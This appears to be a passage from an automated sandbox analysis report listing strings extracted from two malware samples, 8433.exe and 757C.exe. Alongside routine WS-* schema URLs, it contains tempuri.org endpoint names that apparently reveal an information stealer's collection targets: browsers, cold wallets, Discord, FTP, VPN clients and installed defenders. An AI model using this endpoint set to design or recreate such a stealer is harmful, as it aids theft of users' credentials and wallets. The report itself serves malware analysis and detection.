                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.677401695.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessageD
                    Source: 8433.exe, 00000013.00000002.678778613.000000000387D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessageP
                    Source: 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessagePale
                    Source: 757C.exe, 00000016.00000002.677458295.0000000002F3D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessagel
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity$
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/Confirm
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/ConfirmResponse
                    Source: 8433.exe, 00000013.00000002.678778613.000000000387D000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/ConfirmResponseP
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponseD
                    Source: 8433.exe, 00000013.00000002.678778613.000000000387D000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponseP
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponsensesResponseoon
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/Init
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/InitDisplay
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/InitDisplayResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/InitResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartBrowsers
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartBrowsersResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartColdWallets
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartColdWalletsResponse
                    Source: 8433.exe, 00000013.00000002.685746965.00000000047FE000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartDefenders
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartDefendersResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartDiscord
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartDiscordResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartFtpConnections
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartFtpConnectionsResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartHardwares
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartHardwaresResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartInstalledBrowsers
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartInstalledBrowsersResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartInstalledSoftwares
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartInstalledSoftwaresResponse
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartInstalledSoftwaresResponseD
                    Source: 8433.exe, 00000013.00000002.678778613.000000000387D000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartInstalledSoftwaresResponseP
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartLanguages
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartLanguagesResponse
                    Source: 8433.exe, 00000013.00000002.678778613.000000000387D000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartLanguagesResponseP
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartNordVPN
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartNordVPNResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartOpenVPN
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartOpenVPNResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartProcesses
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartProcessesResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.677435791.0000000003726000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartProtonVPN
